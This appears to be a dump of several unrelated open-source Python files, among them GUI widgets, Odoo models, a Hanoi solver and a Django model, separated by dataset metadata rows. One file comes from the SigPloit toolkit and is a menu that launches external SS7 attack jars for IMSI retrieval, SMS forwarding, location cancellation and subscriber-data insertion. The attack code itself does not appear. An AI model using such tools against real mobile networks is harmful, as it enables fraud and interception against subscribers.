gbSizer1.Add(btns, wx.GBPosition(3, 0), wx.GBSpan(1, 1), wx.EXPAND | wx.ALL, 5)
self.SetSizer(gbSizer1)
gbSizer1.Fit(self)
self.Layout()
self.Fit()
self.Centre(wx.BOTH)
self.Fit()
self.Show(True)
def setCharacterSetValue(self, event):
option = event.GetEventObject().GetValue().lower()
self.exportOptions.setCharacterSet(option)
def setFieldDelimiterValue(self, event):
option = event.GetEventObject().GetValue()
if option == "{Tab}":
self.exportOptions.setFieldDelimiter("\t")
elif option == "{Space}":
self.exportOptions.setFieldDelimiter(" ")
else:
self.exportOptions.setFieldDelimiter(option)
def setDecimalSeparatorValue(self, event):
option = event.GetEventObject().GetValue()
self.exportOptions.setdecimalSeparator(option)
def setWriteColumnNameValue(self, event):
option = event.GetEventObject().GetValue()
self.exportOptions.setWriteColNames(option)
def setWriteRowNames(self, event):
option = event.GetEventObject().GetValue()
self.exportOptions.setWriteRowNames(option)
def getSelectedExportOptions(self):
return self.exportOptions
| gpl-3.0 | 7,454,908,388,289,037,000 | 42.022727 | 181 | 0.60029 | false | 3.885765 | true | false | false |
xpansa/odoomrp-wip | product_variants_no_automatic_creation/models/product_attribute_configurator.py | 3 | 2471 | # -*- coding: utf-8 -*-
# (c) 2015 Oihane Crucelaegui - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import api, fields, models
from openerp.addons import decimal_precision as dp
class ProductAttributeConfigurator(models.AbstractModel):
_name = 'product.attribute.configurator'
@api.one
@api.depends('attribute')
def _get_possible_attribute_values(self):
self.possible_values = self.attribute.value_ids.sorted()
@api.one
@api.depends('value')
def _get_price_extra(self):
self.price_extra = sum(self.value.mapped('price_ids.price_extra'))
attribute = fields.Many2one(comodel_name='product.attribute',
string='Attribute')
value = fields.Many2one(comodel_name='product.attribute.value',
domain="[('attribute_id', '=', attribute),"
"('id', 'in', possible_values[0][2])]",
string='Value')
possible_values = fields.Many2many(
comodel_name='product.attribute.value',
compute='_get_possible_attribute_values')
price_extra = fields.Float(
compute='_get_price_extra', string='Attribute Price Extra',
digits=dp.get_precision('Product Price'),
help="Price Extra: Extra price for the variant with this attribute"
" value on sale price. eg. 200 price extra, 1000 + 200 = 1200.")
class ProductProductAttribute(models.Model):
_inherit = 'product.attribute.configurator'
_name = 'product.product.attribute'
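    # Restrict the selectable values to those configured on the product
    # template's attribute lines, and read the price extra defined there.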
@api.one
@api.depends('attribute', 'product.product_tmpl_id',
'product.product_tmpl_id.attribute_line_ids')
def _get_possible_attribute_values(self):
attr_values = self.env['product.attribute.value']
for attr_line in self.product.product_tmpl_id.attribute_line_ids:
if attr_line.attribute_id.id == self.attribute.id:
attr_values |= attr_line.value_ids
self.possible_values = attr_values.sorted()
@api.one
@api.depends('value', 'product.product_tmpl_id')
def _get_price_extra(self):
price_extra = 0.0
for price in self.value.price_ids:
if price.product_tmpl_id.id == self.product.product_tmpl_id.id:
price_extra = price.price_extra
self.price_extra = price_extra
product = fields.Many2one(
comodel_name='product.product', string='Product')
| agpl-3.0 | 9,041,073,232,427,097,000 | 38.854839 | 75 | 0.631323 | false | 3.766768 | false | false | false |
Connor-Y/csc148-assignment1 | Tour.py | 1 | 2464 | # Copyright 2013 Gary Baumgartner
# Distributed under the terms of the GNU General Public License.
#
# This file is part of Assignment 1, CSC148, Fall 2013.
#
# This is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This file is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this file. If not, see <http://www.gnu.org/licenses/>.
from DomainStools import DomainStools
from DomainStools import Cheese
import math
def tour_of_four_stools(n: int, stools: DomainStools) -> None:
"""Move an n cheese tower from the first stool in stools to the fourth.
n - number of cheeses on the first stool of stools
stools - a DomainStools with a tower of cheese on the first stool
and three other empty stools
"""
tour_helper(n, stools, 0, 1, 2, 3)
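# Frame-Stewart scheme: park the top n - ceil(n/2) cheeses on an auxiliary
# stool using all four stools, move the remaining ceil(n/2) with the classic
# three-stool routine, then bring the parked cheeses across with four stools.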
def tour_helper(n: int, stools: DomainStools, input: int, aux1: int, aux2: int, output: int) -> None:
if n == 1:
stools.move(stools.select_top_cheese(input), stools.select_top_cheese(output))
else:
i = math.ceil(n/2)
tour_helper(n-i, stools, input, aux2, output, aux1)
tour_of_three_stools(i, stools, input, aux2, output)
tour_helper(n-i, stools, aux1, input, aux2, output)
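# Classic recursive three-stool Towers of Hanoi.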
def tour_of_three_stools(n: int, stools: DomainStools, input: int, aux: int, output: int) -> None:
if n == 1:
stools.move(stools.select_top_cheese(input), stools.select_top_cheese(output))
else:
tour_of_three_stools(n-1, stools, input, output, aux)
tour_of_three_stools(1, stools, input, aux, output)
tour_of_three_stools(n-1, stools, aux, input, output)
if __name__ == '__main__':
four_stools = DomainStools(4)
for s in range(7, 0, -1):
four_stools.add(0, Cheese(s))
tour_of_four_stools(7, four_stools)
print(four_stools.number_of_moves())
#three_stools = DomainStools(3)
#for s in range(15, 0, -1):
# three_stools.add(0, Cheese(s))
#tour_of_three_stools(15, three_stools, 0, 1, 2)
#print(three_stools.number_of_moves())
| gpl-3.0 | 8,115,787,142,392,570,000 | 38.111111 | 101 | 0.676948 | false | 3.072319 | false | false | false |
keikenuro/kaiju-libnow | kaiju_libnow/libnow/src/business/exceptions/BaseException.py | 1 | 1668 | import os
import sys
class BaseException(Exception):
"""
BaseException class for all the others
exceptions defined for this app.
"""
def __init__(self, message, cause=None, *args, **kwargs):
"""
BaseException gets a message and a cause. These params
will be displayed when the program raises an exception that
is a child of this class.
:param message: obligatory
:param cause: might be None
"""
super(Exception, self).__init__()
self.message = message
self.cause = cause
try:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.filename = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
self.fileline = exc_tb.tb_lineno
except Exception, e:
print args, kwargs
self.filename = ""
self.fileline = ""
def __str__(self):
"""
Override the str method for all the exceptions.
:return: str
"""
# Get the exception class name
exception_class_name = self.__class__.__name__
# This is the str
to_return = "%s: %s"%(exception_class_name, self.message)
if self.cause:
# Get the str of the cause
to_return += "\r\nError at {filename}@{line}. Caused by: {cause}".format(
filename=self.filename,
line=self.fileline,
cause=self.cause
)
return to_return
def __repr__(self):
"""
Override the __repr__ method for all the exceptions.
:return: str
"""
return str(self)
| gpl-3.0 | 5,302,735,792,033,693,000 | 26.8 | 85 | 0.535372 | false | 4.321244 | false | false | false |
mganeva/mantid | scripts/Muon/GUI/Common/grouping_table_widget/grouping_table_widget_view.py | 1 | 16836 | from __future__ import (absolute_import, division, print_function)
from PyQt4 import QtCore, QtGui
from PyQt4.QtCore import pyqtSignal as Signal
import sys
from Muon.GUI.Common.utilities import table_utils
from Muon.GUI.Common import message_box
group_table_columns = {0: 'group_name', 1: 'detector_ids', 2: 'number_of_detectors'}
class GroupingTableView(QtGui.QWidget):
# For use by parent widget
dataChanged = Signal()
addPairRequested = Signal(str, str)
@staticmethod
def warning_popup(message):
message_box.warning(str(message))
def __init__(self, parent=None):
super(GroupingTableView, self).__init__(parent)
self.grouping_table = QtGui.QTableWidget(self)
self.set_up_table()
self.setup_interface_layout()
self.grouping_table.cellChanged.connect(self.on_cell_changed)
self._validate_group_name_entry = lambda text: True
self._validate_detector_ID_entry = lambda text: True
self._on_table_data_changed = lambda: 0
# whether the table is updating and therefore we shouldn't respond to signals
self._updating = False
# whether the interface should be disabled
self._disabled = False
def setup_interface_layout(self):
self.setObjectName("GroupingTableView")
self.resize(500, 500)
self.add_group_button = QtGui.QToolButton()
self.remove_group_button = QtGui.QToolButton()
self.group_range_label = QtGui.QLabel()
self.group_range_label.setText('Group Asymmetry Range from:')
self.group_range_min = QtGui.QLineEdit()
self.group_range_min.setEnabled(False)
positive_float_validator = QtGui.QDoubleValidator(0.0, sys.float_info.max, 5)
self.group_range_min.setValidator(positive_float_validator)
self.group_range_use_first_good_data = QtGui.QCheckBox()
self.group_range_use_first_good_data.setText(u"\u03BCs (From data file)")
self.group_range_use_first_good_data.setChecked(True)
self.group_range_max = QtGui.QLineEdit()
self.group_range_max.setEnabled(False)
self.group_range_max.setValidator(positive_float_validator)
self.group_range_use_last_data = QtGui.QCheckBox()
self.group_range_use_last_data.setText(u"\u03BCs (From data file)")
self.group_range_use_last_data.setChecked(True)
self.group_range_to_label = QtGui.QLabel()
self.group_range_to_label.setText('to:')
self.group_range_layout = QtGui.QGridLayout()
self.group_range_layout_min = QtGui.QHBoxLayout()
self.group_range_layout.addWidget(self.group_range_label, 0, 0)
self.group_range_layout.addWidget(self.group_range_min, 0, 1)
self.group_range_layout.addWidget(self.group_range_use_first_good_data, 0, 2)
self.group_range_layout_max = QtGui.QHBoxLayout()
self.group_range_layout.addWidget(self.group_range_to_label, 1, 0, QtCore.Qt.AlignRight)
self.group_range_layout.addWidget(self.group_range_max, 1, 1)
self.group_range_layout.addWidget(self.group_range_use_last_data, 1, 2)
size_policy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
size_policy.setHorizontalStretch(0)
size_policy.setVerticalStretch(0)
size_policy.setHeightForWidth(self.add_group_button.sizePolicy().hasHeightForWidth())
size_policy.setHeightForWidth(self.remove_group_button.sizePolicy().hasHeightForWidth())
self.add_group_button.setSizePolicy(size_policy)
self.add_group_button.setObjectName("addGroupButton")
self.add_group_button.setToolTip("Add a group to the end of the table")
self.add_group_button.setText("+")
self.remove_group_button.setSizePolicy(size_policy)
self.remove_group_button.setObjectName("removeGroupButton")
self.remove_group_button.setToolTip("Remove selected/last group(s) from the table")
self.remove_group_button.setText("-")
self.horizontal_layout = QtGui.QHBoxLayout()
self.horizontal_layout.setObjectName("horizontalLayout")
self.horizontal_layout.addWidget(self.add_group_button)
self.horizontal_layout.addWidget(self.remove_group_button)
self.spacer_item = QtGui.QSpacerItem(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
self.horizontal_layout.addItem(self.spacer_item)
self.horizontal_layout.setAlignment(QtCore.Qt.AlignLeft)
self.vertical_layout = QtGui.QVBoxLayout(self)
self.vertical_layout.setObjectName("verticalLayout")
self.vertical_layout.addWidget(self.grouping_table)
self.vertical_layout.addLayout(self.horizontal_layout)
self.vertical_layout.addLayout(self.group_range_layout)
self.setLayout(self.vertical_layout)
def set_up_table(self):
self.grouping_table.setColumnCount(3)
self.grouping_table.setHorizontalHeaderLabels(["Group Name", "Detector IDs", "N Detectors"])
header = self.grouping_table.horizontalHeader()
header.setResizeMode(0, QtGui.QHeaderView.Stretch)
header.setResizeMode(1, QtGui.QHeaderView.Stretch)
header.setResizeMode(2, QtGui.QHeaderView.ResizeToContents)
vertical_headers = self.grouping_table.verticalHeader()
vertical_headers.setMovable(False)
vertical_headers.setResizeMode(QtGui.QHeaderView.ResizeToContents)
vertical_headers.setVisible(True)
self.grouping_table.horizontalHeaderItem(0).setToolTip("The name of the group :"
"\n - The name must be unique across all groups/pairs"
"\n - The name can only use digits, characters and _")
self.grouping_table.horizontalHeaderItem(1).setToolTip("The sorted list of detectors :"
"\n - The list can only contain integers."
"\n - , is used to separate detectors or ranges."
"\n - \"-\" denotes a range, i,e \"1-5\" is the same as"
" \"1,2,3,4,5\" ")
self.grouping_table.horizontalHeaderItem(2).setToolTip("The number of detectors in the group.")
def num_rows(self):
return self.grouping_table.rowCount()
def num_cols(self):
return self.grouping_table.columnCount()
def notify_data_changed(self):
if not self._updating:
self.dataChanged.emit()
# ------------------------------------------------------------------------------------------------------------------
# Adding / removing table entries
# ------------------------------------------------------------------------------------------------------------------
def add_entry_to_table(self, row_entries):
assert len(row_entries) == self.grouping_table.columnCount()
row_position = self.grouping_table.rowCount()
self.grouping_table.insertRow(row_position)
for i, entry in enumerate(row_entries):
item = QtGui.QTableWidgetItem(entry)
if group_table_columns[i] == group_table_columns[0]:
# column 0 : group name
group_name_widget = table_utils.ValidatedTableItem(self._validate_group_name_entry)
group_name_widget.setText(entry)
self.grouping_table.setItem(row_position, 0, group_name_widget)
self.grouping_table.item(row_position, 0).setToolTip(entry)
item.setFlags(QtCore.Qt.ItemIsEnabled)
item.setFlags(QtCore.Qt.ItemIsSelectable)
if group_table_columns[i] == group_table_columns[1]:
# column 1 : detector IDs
detector_widget = table_utils.ValidatedTableItem(self._validate_detector_ID_entry)
detector_widget.setText(entry)
self.grouping_table.setItem(row_position, 1, detector_widget)
self.grouping_table.item(row_position, 1).setToolTip(entry)
if group_table_columns[i] == group_table_columns[2]:
# column 2 : number of detectors
item.setFlags(QtCore.Qt.ItemIsEnabled)
item.setFlags(QtCore.Qt.ItemIsSelectable)
self.grouping_table.setItem(row_position, i, item)
def _get_selected_row_indices(self):
return list(set(index.row() for index in self.grouping_table.selectedIndexes()))
def get_selected_group_names(self):
indexes = self._get_selected_row_indices()
return [str(self.grouping_table.item(i, 0).text()) for i in indexes]
def remove_selected_groups(self):
indices = self._get_selected_row_indices()
for index in reversed(sorted(indices)):
self.grouping_table.removeRow(index)
def remove_last_row(self):
last_row = self.grouping_table.rowCount() - 1
if last_row >= 0:
self.grouping_table.removeRow(last_row)
def enter_group_name(self):
new_group_name, ok = QtGui.QInputDialog.getText(self, 'Group Name', 'Enter name of new group:')
if ok:
return new_group_name
# ------------------------------------------------------------------------------------------------------------------
# Context menu on right-click in the table
# ------------------------------------------------------------------------------------------------------------------
def _context_menu_add_group_action(self, slot):
add_group_action = QtGui.QAction('Add Group', self)
if len(self._get_selected_row_indices()) > 0:
add_group_action.setEnabled(False)
add_group_action.triggered.connect(slot)
return add_group_action
def _context_menu_remove_group_action(self, slot):
if len(self._get_selected_row_indices()) > 1:
# use plural if >1 item selected
remove_group_action = QtGui.QAction('Remove Groups', self)
else:
remove_group_action = QtGui.QAction('Remove Group', self)
if self.num_rows() == 0:
remove_group_action.setEnabled(False)
remove_group_action.triggered.connect(slot)
return remove_group_action
def _context_menu_add_pair_action(self, slot):
add_pair_action = QtGui.QAction('Add Pair', self)
if len(self._get_selected_row_indices()) != 2:
add_pair_action.setEnabled(False)
add_pair_action.triggered.connect(slot)
return add_pair_action
def contextMenuEvent(self, _event):
"""Overridden method"""
self.menu = QtGui.QMenu(self)
self.add_group_action = self._context_menu_add_group_action(self.add_group_button.clicked.emit)
self.remove_group_action = self._context_menu_remove_group_action(self.remove_group_button.clicked.emit)
self.add_pair_action = self._context_menu_add_pair_action(self.add_pair_requested)
if self._disabled:
self.add_group_action.setEnabled(False)
self.remove_group_action.setEnabled(False)
self.add_pair_action.setEnabled(False)
self.menu.addAction(self.add_group_action)
self.menu.addAction(self.remove_group_action)
self.menu.addAction(self.add_pair_action)
self.menu.popup(QtGui.QCursor.pos())
# ------------------------------------------------------------------------------------------------------------------
# Slot connections
# ------------------------------------------------------------------------------------------------------------------
def on_user_changes_group_name(self, slot):
self._validate_group_name_entry = slot
def on_user_changes_detector_IDs(self, slot):
self._validate_detector_ID_entry = slot
def on_add_group_button_clicked(self, slot):
self.add_group_button.clicked.connect(slot)
def on_remove_group_button_clicked(self, slot):
self.remove_group_button.clicked.connect(slot)
def on_table_data_changed(self, slot):
self._on_table_data_changed = slot
def add_pair_requested(self):
selected_names = self.get_selected_group_names()
self.addPairRequested.emit(selected_names[0], selected_names[1])
def on_cell_changed(self, _row, _col):
if not self._updating:
self._on_table_data_changed(_row, _col)
def on_user_changes_min_range_source(self, slot):
self.group_range_use_first_good_data.stateChanged.connect(slot)
def on_user_changes_max_range_source(self, slot):
self.group_range_use_last_data.stateChanged.connect(slot)
def on_user_changes_group_range_min_text_edit(self, slot):
self.group_range_min.editingFinished.connect(slot)
def on_user_changes_group_range_max_text_edit(self, slot):
self.group_range_max.editingFinished.connect(slot)
# ------------------------------------------------------------------------------------------------------------------
#
# ------------------------------------------------------------------------------------------------------------------
def get_table_item_text(self, row, col):
return self.grouping_table.item(row, col).text()
def get_table_contents(self):
if self._updating:
return []
ret = []
for row in range(self.num_rows()):
row_list = []
for col in range(self.num_cols()):
row_list.append(str(self.grouping_table.item(row, col).text()))
ret.append(row_list)
return ret
def clear(self):
# Go backwards to preserve indices
for row in reversed(range(self.num_rows())):
self.grouping_table.removeRow(row)
# ------------------------------------------------------------------------------------------------------------------
# Enabling and disabling editing and updating of the widget
# ------------------------------------------------------------------------------------------------------------------
def disable_updates(self):
"""Usage : """
self._updating = True
def enable_updates(self):
"""Usage : """
self._updating = False
def disable_editing(self):
self.disable_updates()
self._disabled = True
self._disable_buttons()
self._disable_all_table_items()
self._disable_group_ranges()
self.enable_updates()
def enable_editing(self):
self.disable_updates()
self._disabled = False
self._enable_buttons()
self._enable_all_table_items()
self._enable_group_ranges()
self.enable_updates()
def _enable_group_ranges(self):
self.group_range_use_first_good_data.setEnabled(True)
self.group_range_use_last_data.setEnabled(True)
if not self.group_range_use_first_good_data.isChecked():
self.group_range_min.setEnabled(True)
if not self.group_range_use_last_data.isChecked():
self.group_range_max.setEnabled(True)
def _disable_group_ranges(self):
self.group_range_use_first_good_data.setEnabled(False)
self.group_range_use_last_data.setEnabled(False)
self.group_range_min.setEnabled(False)
self.group_range_max.setEnabled(False)
def _enable_buttons(self):
self.add_group_button.setEnabled(True)
self.remove_group_button.setEnabled(True)
def _disable_buttons(self):
self.add_group_button.setEnabled(False)
self.remove_group_button.setEnabled(False)
def _disable_all_table_items(self):
for row in range(self.num_rows()):
for col in range(self.num_cols()):
item = self.grouping_table.item(row, col)
item.setFlags(QtCore.Qt.ItemIsSelectable)
def _enable_all_table_items(self):
for row in range(self.num_rows()):
for col in range(self.num_cols()):
item = self.grouping_table.item(row, col)
if group_table_columns[col] == 'detector_ids':
item.setFlags(QtCore.Qt.ItemIsSelectable |
QtCore.Qt.ItemIsEditable |
QtCore.Qt.ItemIsEnabled)
else:
# Group name and number of detectors should remain un-editable
item.setFlags(QtCore.Qt.ItemIsSelectable)
def get_group_range(self):
return str(self.group_range_min.text()), str(self.group_range_max.text())
def set_group_range(self, range):
self.group_range_min.setText(range[0])
self.group_range_max.setText(range[1])
| gpl-3.0 | -4,333,006,931,446,137,300 | 43.188976 | 120 | 0.59153 | false | 4.063722 | false | false | false |
joelmir/job_test_questions | candidates/models.py | 1 | 2370 | # -*- coding: utf-8 -*-
from django.db import models
from questions.models import Question
from django.core.mail import send_mail
from django.conf import settings
class Candidate(models.Model):
name = models.CharField(max_length=200)
email = models.EmailField()
def __unicode__(self):
return u'{0} - {1}'.format(self.name, self.email)
def send_mail(self):
questions_id = Answer.objects.filter(candidate=self, grade__gte=7).values_list('question_id')
questions = [question.lower().strip() for question in Question.objects.filter(id__in=questions_id).values_list('question_text', flat=True)]
default_mail = True
if 'html' in questions and 'css' in questions and 'javascript' in questions:
default_mail = False
print 'Front-End'
send_mail('Obrigado por se candidatar', '''Obrigado por se candidatar, assim que tivermos uma vaga disponível
para programador Front-End entraremos em contato.''' , '[email protected]',[self.email], fail_silently=False)
if 'python' in questions and 'django' in questions:
default_mail = False
print 'Back-End'
send_mail('Obrigado por se candidatar', '''Obrigado por se candidatar, assim que tivermos uma vaga disponível
para programador Back-End entraremos em contato.''' , '[email protected]',[self.email], fail_silently=False)
if 'desenvolvedor ios' in questions or 'desenvolvedor android' in questions:
default_mail = False
print 'Mobile'
send_mail('Obrigado por se candidatar', '''Obrigado por se candidatar, assim que tivermos uma vaga disponível
para programador Mobile entraremos em contato.''' , '[email protected]',[self.email], fail_silently=False)
if default_mail:
print 'Default: ', self.email
send_mail('Obrigado por se candidatar', '''Obrigado por se candidatar, assim que tivermos uma vaga disponível
para programador entraremos em contato.''' , settings.DEFAULT_FROM ,[self.email], fail_silently=False)
class Answer(models.Model):
candidate = models.ForeignKey(Candidate)
question = models.ForeignKey(Question)
grade = models.IntegerField()
def __unicode__(self):
return u'{0} - {1} - {2}'.format(self.candidate.name, self.question, self.grade)
| mit | 8,692,020,386,437,051,000 | 42.814815 | 147 | 0.679628 | false | 3.459064 | false | false | false |
ISISComputingGroup/EPICS-inst_servers | CollisionAvoidanceMonitor/geometry.py | 1 | 2255 | import numpy as np
import ode
from CollisionAvoidanceMonitor.transform import Transformation
class GeometryBox(object):
def __init__(self, space, position=(0, 0, 0), size=(1, 1, 1), color=(1, 1, 1), oversize=1, name=None):
# Set parameters for drawing the body
self.color = color
self.size = list(size)
self.oversize = oversize
# Create a box geom for collision detection
self.geom = ode.GeomBox(space, lengths=[s + 2 + oversize for s in self.size])
self.geom.setPosition(position)
# A friendly name
self.name = name
# Set the size of the ODE geometry
def set_size(self, x=None, y=None, z=None, oversize=None):
# Only need to set the size of dimensions supplied
if x is not None:
self.size[0] = x
if y is not None:
self.size[1] = y
if z is not None:
self.size[2] = z
if oversize is not None:
self.oversize = oversize
self.geom.setLengths([s + 2 * self.oversize for s in self.size])
# Set the transform for the geometry
def set_transform(self, transform):
# Get the rotation and position elements from the transformation matrix
rot, pos = transform.get_rotation_matrix(), transform.get_position_matrix()
# Reshape the rotation matrix into a ODE friendly format
rot = np.reshape(rot, 9)
# Apply the translation and rotation to the ODE geometry
self.geom.setPosition(pos)
self.geom.setRotation(rot)
def get_transform(self):
t = Transformation()
t.join(self.geom.getRotation(), self.geom.getPosition())
return t
def get_vertices(self):
vertices = np.array([(-0.5, -0.5, 0.5),
(0.5, -0.5, 0.5),
(0.5, 0.5, 0.5),
(-0.5, 0.5, 0.5),
(-0.5, -0.5, -0.5),
(0.5, -0.5, -0.5),
(0.5, 0.5, -0.5),
(-0.5, 0.5, -0.5)])
vertices *= self.geom.getLengths()
t = self.get_transform()
vertices = [t.evaluate(v) for v in vertices]
return vertices
| bsd-3-clause | -474,506,855,969,731,600 | 33.692308 | 106 | 0.54235 | false | 3.690671 | false | false | false |
purplewall1206/musicbox | NEMbox/scrollstring.py | 13 | 1403 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from time import time
import locale
locale.setlocale(locale.LC_ALL, '')
code = locale.getpreferredencoding()
class scrollstring:
def __init__(self, content, START):
self.content = content # the true content of the string
self.display = content # the displayed string
self.START = START//1 # when this instance is created
self.update()
def update(self):
self.display = self.content
curTime = time()//1
offset = max(int((curTime - self.START) % len(self.content)) - 1, 0)
while offset > 0:
if self.display[0] > chr(127):
offset -= 1
self.display = self.display[3:] + self.display[:3]
else:
offset -= 1
self.display = self.display[1:] + self.display[:1]
# self.display = self.content[offset:] + self.content[:offset]
def __repr__(self):
return self.display
# determine the display length of a string
def truelen(string):
"""
It appears one Asian character takes two spots, but __len__
counts it as three, so this function counts the dispalyed
length of the string.
>>> truelen('abc')
3
>>> truelen('你好')
4
>>> truelen('1二3')
4
>>> truelen('')
0
"""
return len(string) - sum(1 for c in string if c > chr(127))/3
| mit | -311,629,064,321,845,250 | 25.358491 | 76 | 0.573372 | false | 3.745308 | false | false | false |
SigPloiter/SigPloit | ss7/fraud.py | 1 | 5988 | #!/usr/bin/env python
"""
Created on 1 Feb 2018
@author: loay
"""
import os
import sys
import time
from subprocess import *
import sigploit
import ss7main
simsi_path = os.path.join(os.getcwd(), 'ss7/attacks/fraud/simsi')
mtsms_path = os.path.join(os.getcwd(), 'ss7/attacks/fraud/mtsms')
cl_path = os.path.join(os.getcwd(), 'ss7/attacks/fraud/cl')
isd_path = os.path.join(os.getcwd(),'ss7/attacks/fraud/isd')
sai_path = os.path.join(os.getcwd(),'ss7/attacks/fraud/sai')
def simsi():
jar_file = 'SendIMSI.jar'
try:
sendIMSI = check_call(['java', '-jar', os.path.join(simsi_path, jar_file)])
if sendIMSI == 0:
fr = raw_input('\nWould you like to go back to Fraud Menu? (y/n): ')
if fr == 'y' or fr == 'yes':
ss7main.ss7fraud()
elif fr == 'n' or fr == 'no':
attack_menu = raw_input('Would you like to choose another attacks category? (y/n): ')
if attack_menu == 'y' or attack_menu == 'yes':
ss7main.attacksMenu()
elif attack_menu == 'n' or attack_menu == 'no':
main_menu = raw_input('Would you like to go back to the main menu? (y/exit): ')
if main_menu == 'y' or main_menu == 'yes':
sigploit.mainMenu()
elif main_menu == 'exit':
print 'TCAP End...'
sys.exit(0)
except CalledProcessError as e:
print "\033[31m[-]Error:\033[0m%s Failed to Launch, %s" %(jar_file, e.message)
time.sleep(2)
ss7main.ss7fraud()
def mtsms():
jar_file = 'MTForwardSMS.jar'
try:
mtForwardSMS = check_call(['java', '-jar', os.path.join(mtsms_path, jar_file)])
if mtForwardSMS == 0:
fr = raw_input('\nWould you like to go back to Fraud Menu? (y/n): ')
if fr == 'y' or fr == 'yes':
ss7main.ss7fraud()
elif fr == 'n' or fr == 'no':
attack_menu = raw_input('Would you like to choose another attacks category? (y/n): ')
if attack_menu == 'y' or attack_menu == 'yes':
ss7main.attacksMenu()
elif attack_menu == 'n' or attack_menu == 'no':
main_menu = raw_input('Would you like to go back to the main menu? (y/exit): ')
if main_menu == 'y' or main_menu == 'yes':
sigploit.mainMenu()
elif main_menu == 'exit':
print 'TCAP End...'
sys.exit(0)
except CalledProcessError as e:
print "\033[31m[-]Error:\033[0mMTForwardSMS Failed to Launch, " + str(e)
time.sleep(2)
ss7main.ss7fraud()
def cl():
jar_file = 'CancelLocation.jar'
try:
cancelLocation = check_call(['java', '-jar', os.path.join(cl_path, jar_file)])
if cancelLocation == 0:
fr = raw_input('\nWould you like to go back to Fraud Menu? (y/n): ')
if fr == 'y' or fr == 'yes':
ss7main.ss7fraud()
elif fr == 'n' or fr == 'no':
attack_menu = raw_input('Would you like to choose another attacks category? (y/n): ')
if attack_menu == 'y' or attack_menu == 'yes':
ss7main.attacksMenu()
elif attack_menu == 'n' or attack_menu == 'no':
main_menu = raw_input('Would you like to go back to the main menu? (y/exit): ')
if main_menu == 'y' or main_menu == 'yes':
sigploit.mainMenu()
elif main_menu == 'exit':
print 'TCAP End...'
sys.exit(0)
except CalledProcessError as e:
print "\033[31m[-]Error:\033[0mCancelLocation Failed to Launch, " + str(e)
time.sleep(2)
ss7main.ss7fraud()
def isd():
jar_file = 'InsertSubscriberData.jar'
try:
insertSD = check_call(['java','-jar', os.path.join(isd_path,jar_file)])
if insertSD == 0:
fr = raw_input('\nWould you like to go back to Fraud Menu? (y/n): ')
if fr == 'y' or fr == 'yes':
ss7main.Fraud()
elif fr == 'n' or fr == 'no':
attack_menu = raw_input('Would you like to choose another attacks category? (y/n): ')
if attack_menu == 'y'or attack_menu =='yes':
ss7main.attacksMenu()
elif attack_menu == 'n' or attack_menu =='no':
main_menu = raw_input('Would you like to go back to the main menu? (y/exit): ')
if main_menu == 'y' or main_menu =='yes':
sigploit.mainMenu()
elif main_menu =='exit':
print 'TCAP End...'
sys.exit(0)
except CalledProcessError as e:
print "\033[31m[-]Error:\033[0mInsertSubscriberData Failed to Launch, " + str(e)
time.sleep(2)
ss7main.ss7fraud()
def sai():
jar_file = 'SendAuthenticationInfo.jar'
try:
sendAuth = check_call(['java', '-jar', os.path.join(sai_path, jar_file)])
if sendAuth == 0:
fr = raw_input('\nWould you like to go back to Fraud Menu? (y/n): ')
if fr == 'y' or fr == 'yes':
ss7main.ss7fraud()
elif fr == 'n' or fr == 'no':
attack_menu = raw_input('Would you like to choose another attacks category? (y/n): ')
if attack_menu == 'y' or attack_menu == 'yes':
ss7main.attacksMenu()
elif attack_menu == 'n' or attack_menu == 'no':
main_menu = raw_input('Would you like to go back to the main menu? (y/exit): ')
if main_menu == 'y' or main_menu == 'yes':
sigploit.mainMenu()
elif main_menu == 'exit':
print 'TCAP End...'
sys.exit(0)
except CalledProcessError as e:
print "\033[31m[-]Error:\033[0m%s Failed to Launch, %s" %(jar_file, e.message)
time.sleep(2)
ss7main.ss7fraud() | mit | -2,386,668,206,320,904,700 | 37.146497 | 101 | 0.519038 | false | 3.31378 | false | false | false |
CtrlC-Root/cse3341 | Core/cse3341/pt/operand.py | 1 | 1699 | from ..token import Token
from .node import Node
from .constant import Constant
from .identifier import Identifier
from .expression import Expression
class Operand(Node):
"""
An operand.
"""
def __init__(self):
"""
Create the operand.
"""
self.value = None
@classmethod
def parse(cls, tokenizer, identifiers):
"""
Parse an operand.
"""
operand = Operand()
if tokenizer.get_token() == Token.INTEGER_CONSTANT:
operand.value = Constant.parse(tokenizer, identifiers)
elif tokenizer.get_token() == Token.IDENTIFIER:
operand.value = Identifier.parse(tokenizer, identifiers)
else:
cls.extract_token(tokenizer, Token.OPENING_PARENTHESIS)
operand.value = Expression.parse(tokenizer, identifiers)
cls.extract_token(tokenizer, Token.CLOSING_PARENTHESIS)
return operand
def evaluate(self, identifiers):
"""
Evaluate the operand and return its value.
"""
if isinstance(self.value, Expression):
return self.value.evaluate(identifiers)
elif isinstance(self.value, Identifier):
return identifiers.get_value(self.value.name)
else:
return self.value.value
def __str__(self):
"""
Human-readable string representation.
"""
parts = [self.value]
if isinstance(self.value, Expression):
parts = [
Token.OPENING_PARENTHESIS.value[1],
self.value,
Token.CLOSING_PARENTHESIS.value[1]]
return " ".join(map(lambda d: str(d), parts))
| mit | -5,072,925,527,626,581,000 | 24.742424 | 68 | 0.58505 | false | 4.654795 | false | false | false |
elric/virtaal-debian | virtaal/modes/quicktransmode.py | 6 | 1883 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2008-2009 Zuza Software Foundation
#
# This file is part of Virtaal.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
